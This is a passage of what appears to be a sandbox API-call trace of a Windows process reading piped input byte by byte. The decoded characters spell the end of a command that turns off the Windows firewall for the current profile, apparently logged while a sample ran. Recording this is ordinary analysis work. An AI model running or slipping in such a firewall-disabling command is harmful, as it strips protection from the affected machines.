lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xdd04cffb48, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xdd04cffb48*=0x1, lpOverlapped=0x0) returned 1 [0045.447] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c46, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0045.447] _get_osfhandle (_FileHandle=0) returned 0x2a4 [0045.447] SetFilePointer (in: hFile=0x2a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.447] ReadFile (in: hFile=0x2a4, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xdd04cffb48, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xdd04cffb48*=0x1, lpOverlapped=0x0) returned 1 [0045.447] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c48, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0045.447] _get_osfhandle (_FileHandle=0) returned 0x2a4 [0045.447] SetFilePointer (in: hFile=0x2a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.447] ReadFile (in: hFile=0x2a4, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xdd04cffb48, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xdd04cffb48*=0x1, lpOverlapped=0x0) returned 1 [0045.447] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c4a, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0045.447] _get_osfhandle (_FileHandle=0) returned 0x2a4 [0045.447] SetFilePointer (in: hFile=0x2a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.447] ReadFile (in: hFile=0x2a4, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xdd04cffb48, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xdd04cffb48*=0x1, lpOverlapped=0x0) returned 1 [0045.447] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c4c, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0045.448] _get_osfhandle (_FileHandle=0) returned 0x2a4 [0045.448] SetFilePointer (in: hFile=0x2a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.448] ReadFile (in: hFile=0x2a4, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xdd04cffb48, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xdd04cffb48*=0x1, lpOverlapped=0x0) returned 1 [0045.448] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c4e, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0045.448] _get_osfhandle (_FileHandle=0) returned 0x2a4 [0045.448] SetFilePointer (in: hFile=0x2a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.448] ReadFile (in: hFile=0x2a4, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xdd04cffb48, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xdd04cffb48*=0x1, lpOverlapped=0x0) returned 1 [0045.448] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c50, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0045.448] _get_osfhandle (_FileHandle=0) returned 0x2a4 [0045.448] SetFilePointer (in: hFile=0x2a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.448] ReadFile (in: hFile=0x2a4, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xdd04cffb48, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xdd04cffb48*=0x1, lpOverlapped=0x0) returned 1 [0045.448] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c52, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0045.448] _get_osfhandle (_FileHandle=0) returned 0x2a4 [0045.448] SetFilePointer (in: hFile=0x2a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.448] ReadFile (in: hFile=0x2a4, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xdd04cffb48, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xdd04cffb48*=0x1, lpOverlapped=0x0) returned 1 [0045.448] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c54, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0045.448] _get_osfhandle (_FileHandle=0) returned 0x2a4 [0045.448] SetFilePointer (in: hFile=0x2a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.448] ReadFile (in: hFile=0x2a4, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xdd04cffb48, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xdd04cffb48*=0x1, lpOverlapped=0x0) returned 1 [0045.448] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c56, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0045.448] _get_osfhandle (_FileHandle=0) returned 0x2a4 [0045.448] SetFilePointer (in: hFile=0x2a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.448] ReadFile (in: hFile=0x2a4, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xdd04cffb48, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xdd04cffb48*=0x1, lpOverlapped=0x0) returned 1 [0045.448] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c58, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0045.448] _get_osfhandle (_FileHandle=0) returned 0x2a4 [0045.448] SetFilePointer (in: hFile=0x2a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.448] ReadFile (in: hFile=0x2a4, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xdd04cffb48, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xdd04cffb48*=0x1, lpOverlapped=0x0) returned 1 [0045.448] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c5a, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0045.449] _get_osfhandle (_FileHandle=0) returned 0x2a4 [0045.449] SetFilePointer (in: hFile=0x2a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.449] ReadFile (in: hFile=0x2a4, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xdd04cffb48, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xdd04cffb48*=0x1, lpOverlapped=0x0) returned 1 [0045.449] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c5c, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0045.449] _get_osfhandle (_FileHandle=0) returned 0x2a4 [0045.449] SetFilePointer (in: hFile=0x2a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.449] ReadFile (in: hFile=0x2a4, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xdd04cffb48, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xdd04cffb48*=0x1, lpOverlapped=0x0) returned 1 [0045.449] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c5e, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0045.449] _get_osfhandle (_FileHandle=0) returned 0x2a4 [0045.449] SetFilePointer (in: hFile=0x2a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.449] ReadFile (in: hFile=0x2a4, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xdd04cffb48, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xdd04cffb48*=0x1, lpOverlapped=0x0) returned 1 [0045.449] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c60, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0045.449] _get_osfhandle (_FileHandle=0) returned 0x2a4 [0045.449] SetFilePointer (in: hFile=0x2a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.449] ReadFile (in: hFile=0x2a4, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xdd04cffb48, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xdd04cffb48*=0x1, lpOverlapped=0x0) returned 1 [0045.449] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c62, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0045.449] _get_osfhandle (_FileHandle=0) returned 0x2a4 [0045.449] SetFilePointer (in: hFile=0x2a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.449] ReadFile (in: hFile=0x2a4, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xdd04cffb48, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xdd04cffb48*=0x1, lpOverlapped=0x0) returned 1 [0045.449] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c64, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0045.449] _get_osfhandle (_FileHandle=0) returned 0x2a4 [0045.449] SetFilePointer (in: hFile=0x2a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.449] ReadFile (in: hFile=0x2a4, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xdd04cffb48, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xdd04cffb48*=0x1, lpOverlapped=0x0) returned 1 [0045.449] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c66, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0045.449] _get_osfhandle (_FileHandle=0) returned 0x2a4 [0045.449] SetFilePointer (in: hFile=0x2a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.449] ReadFile (in: hFile=0x2a4, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xdd04cffb48, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xdd04cffb48*=0x1, lpOverlapped=0x0) returned 1 [0045.450] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c68, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0045.450] _get_osfhandle (_FileHandle=0) returned 0x2a4 [0045.450] SetFilePointer (in: hFile=0x2a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.450] ReadFile (in: hFile=0x2a4, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xdd04cffb48, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xdd04cffb48*=0x1, lpOverlapped=0x0) returned 1 [0045.450] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c6a, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0045.450] _get_osfhandle (_FileHandle=0) returned 0x2a4 [0045.450] SetFilePointer (in: hFile=0x2a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.450] ReadFile (in: hFile=0x2a4, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xdd04cffb48, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xdd04cffb48*=0x1, lpOverlapped=0x0) returned 1 [0045.450] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c6c, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0045.450] _get_osfhandle (_FileHandle=0) returned 0x2a4 [0045.450] SetFilePointer (in: hFile=0x2a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.450] ReadFile (in: hFile=0x2a4, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xdd04cffb48, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xdd04cffb48*=0x1, lpOverlapped=0x0) returned 1 [0045.450] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c6e, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0045.450] _get_osfhandle (_FileHandle=0) returned 0x2a4 [0045.450] SetFilePointer (in: hFile=0x2a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.450] ReadFile (in: hFile=0x2a4, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xdd04cffb48, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xdd04cffb48*=0x1, lpOverlapped=0x0) returned 1 [0045.450] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c70, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0045.450] _get_osfhandle (_FileHandle=0) returned 0x2a4 [0045.450] SetFilePointer (in: hFile=0x2a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.450] ReadFile (in: hFile=0x2a4, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xdd04cffb48, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xdd04cffb48*=0x1, lpOverlapped=0x0) returned 1 [0045.450] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c72, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0045.450] _get_osfhandle (_FileHandle=0) returned 0x2a4 [0045.450] SetFilePointer (in: hFile=0x2a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.450] ReadFile (in: hFile=0x2a4, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xdd04cffb48, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xdd04cffb48*=0x1, lpOverlapped=0x0) returned 1 [0045.450] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c74, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0045.450] _get_osfhandle (_FileHandle=0) returned 0x2a4 [0045.450] SetFilePointer (in: hFile=0x2a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.451] ReadFile (in: hFile=0x2a4, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xdd04cffb48, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xdd04cffb48*=0x1, lpOverlapped=0x0) returned 1 [0045.451] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c76, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0045.451] _get_osfhandle (_FileHandle=0) returned 0x2a4 [0045.451] SetFilePointer (in: hFile=0x2a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.451] ReadFile (in: hFile=0x2a4, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xdd04cffb48, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xdd04cffb48*=0x1, lpOverlapped=0x0) returned 1 [0045.451] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c78, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0045.451] _get_osfhandle (_FileHandle=0) returned 0x2a4 [0045.451] SetFilePointer (in: hFile=0x2a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.451] ReadFile (in: hFile=0x2a4, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xdd04cffb48, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xdd04cffb48*=0x1, lpOverlapped=0x0) returned 1 [0045.451] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c7a, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0045.451] _get_osfhandle (_FileHandle=0) returned 0x2a4 [0045.451] SetFilePointer (in: hFile=0x2a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.451] ReadFile (in: hFile=0x2a4, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xdd04cffb48, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xdd04cffb48*=0x1, lpOverlapped=0x0) returned 1 [0045.451] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c7c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0045.451] _get_osfhandle (_FileHandle=0) returned 0x2a4 [0045.451] SetFilePointer (in: hFile=0x2a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.451] ReadFile (in: hFile=0x2a4, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xdd04cffb48, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xdd04cffb48*=0x1, lpOverlapped=0x0) returned 1 [0045.451] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c7e, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0045.451] _get_osfhandle (_FileHandle=0) returned 0x2a4 [0045.451] SetFilePointer (in: hFile=0x2a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.451] ReadFile (in: hFile=0x2a4, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xdd04cffb48, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xdd04cffb48*=0x1, lpOverlapped=0x0) returned 1 [0045.451] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c80, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0045.451] _get_osfhandle (_FileHandle=0) returned 0x2a4 [0045.451] SetFilePointer (in: hFile=0x2a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.451] ReadFile (in: hFile=0x2a4, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xdd04cffb48, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xdd04cffb48*=0x1, lpOverlapped=0x0) returned 1 [0045.451] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c82, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0045.451] _get_osfhandle (_FileHandle=0) returned 0x2a4 [0045.451] SetFilePointer (in: hFile=0x2a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.451] ReadFile (in: hFile=0x2a4, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xdd04cffb48, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xdd04cffb48*=0x1, lpOverlapped=0x0) returned 1 [0045.452] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c84, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0045.452] _get_osfhandle (_FileHandle=0) returned 0x2a4 [0045.452] SetFilePointer (in: hFile=0x2a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.452] ReadFile (in: hFile=0x2a4, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xdd04cffb48, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xdd04cffb48*=0x1, lpOverlapped=0x0) returned 1 [0045.452] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c86, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0045.452] _get_osfhandle (_FileHandle=0) returned 0x2a4 [0045.452] SetFilePointer (in: hFile=0x2a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.452] ReadFile (in: hFile=0x2a4, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xdd04cffb48, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xdd04cffb48*=0x1, lpOverlapped=0x0) returned 1 [0045.452] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c88, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0045.452] _get_osfhandle (_FileHandle=0) returned 0x2a4 [0045.452] SetFilePointer (in: hFile=0x2a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.452] ReadFile (in: hFile=0x2a4, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xdd04cffb48, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xdd04cffb48*=0x1, lpOverlapped=0x0) returned 1 [0045.452] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c8a, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0045.452] _get_osfhandle (_FileHandle=0) returned 0x2a4 [0045.452] SetFilePointer (in: hFile=0x2a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.452] ReadFile (in: hFile=0x2a4, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xdd04cffb48, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xdd04cffb48*=0x1, lpOverlapped=0x0) returned 1 [0045.452] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c8c, cchWideChar=1 | out: lpWideCharStr="\n") returned 1 [0045.453] _get_osfhandle (_FileHandle=0) returned 0x2a4 [0045.453] GetFileType (hFile=0x2a4) returned 0x3 [0045.453] _get_osfhandle 